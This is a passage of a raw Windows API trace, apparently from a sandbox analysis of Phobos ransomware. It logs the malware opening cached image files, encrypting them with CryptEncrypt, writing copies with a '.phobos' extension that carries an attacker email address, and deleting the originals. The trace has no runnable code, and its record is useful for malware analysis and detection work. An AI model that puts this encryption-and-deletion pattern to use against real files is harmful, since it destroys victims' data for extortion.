pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3c50, dwBufLen=0x3c50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3c50) returned 1 [0176.256] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3c50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3c50, lpOverlapped=0x0) returned 1 [0176.257] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0176.257] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.257] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.257] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.257] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.257] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.257] CloseHandle (hObject=0x148) returned 1 [0176.257] CloseHandle (hObject=0x178) returned 1 [0176.257] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfjuT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefjut[1].jpg")) returned 1 [0176.259] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgiYw[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegiyw[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.286] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=9213) returned 1 [0176.286] CloseHandle (hObject=0x178) returned 1 [0176.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgiYw[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegiyw[1].jpg")) returned 0x2020 [0176.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgiYw[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegiyw[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgiYw[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegiyw[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.286] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.286] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgiYw[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegiyw[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.286] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.286] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.286] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x23fd, lpOverlapped=0x0) returned 1 [0176.305] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2400, dwBufLen=0x2400 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2400) returned 1 [0176.305] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2400, lpOverlapped=0x0) returned 1 [0176.306] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0176.306] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.306] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.306] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.306] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.306] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.306] CloseHandle (hObject=0x178) returned 1 [0176.306] CloseHandle (hObject=0x148) returned 1 [0176.306] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgiYw[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegiyw[1].jpg")) returned 1 [0176.307] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgqtY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegqty[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.311] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1968) returned 1 [0176.311] CloseHandle (hObject=0x148) returned 1 [0176.311] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgqtY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegqty[1].jpg")) returned 0x2020 [0176.311] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgqtY[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegqty[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgqtY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegqty[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.311] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.311] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgqtY[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegqty[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.312] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.312] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.312] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7b0, lpOverlapped=0x0) returned 1 [0176.333] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0, dwBufLen=0x7c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0) returned 1 [0176.333] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7c0, lpOverlapped=0x0) returned 1 [0176.334] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0176.334] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.334] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.334] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.335] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.335] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.335] CloseHandle (hObject=0x148) returned 1 [0176.335] CloseHandle (hObject=0x178) returned 1 [0176.335] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgqtY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegqty[1].jpg")) returned 1 [0176.336] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[2].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.337] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6182) returned 1 [0176.337] CloseHandle (hObject=0x178) returned 1 [0176.337] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[2].jpg")) returned 0x2020 [0176.337] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[2].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.337] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.337] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.337] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.337] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.338] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1826, lpOverlapped=0x0) returned 1 [0176.351] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1830, dwBufLen=0x1830 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1830) returned 1 [0176.351] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1830, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1830, lpOverlapped=0x0) returned 1 [0176.351] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0176.352] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.352] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.352] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.352] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.352] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.352] CloseHandle (hObject=0x178) returned 1 [0176.352] CloseHandle (hObject=0x148) returned 1 [0176.352] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegtcs[2].jpg")) returned 1 [0176.353] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[2].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.354] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1509) returned 1 [0176.354] CloseHandle (hObject=0x148) returned 1 [0176.354] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[2].jpg")) returned 0x2020 [0176.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[2].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.355] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.355] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.356] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.356] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.356] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5e5, lpOverlapped=0x0) returned 1 [0176.365] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5f0, dwBufLen=0x5f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5f0) returned 1 [0176.365] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5f0, lpOverlapped=0x0) returned 1 [0176.366] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0176.366] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.366] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.367] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.367] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.367] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.367] CloseHandle (hObject=0x148) returned 1 [0176.367] CloseHandle (hObject=0x178) returned 1 [0176.367] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[2].jpg")) returned 1 [0176.368] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgyIm[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegyim[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.369] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13669) returned 1 [0176.369] CloseHandle (hObject=0x178) returned 1 [0176.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgyIm[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegyim[1].jpg")) returned 0x2020 [0176.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 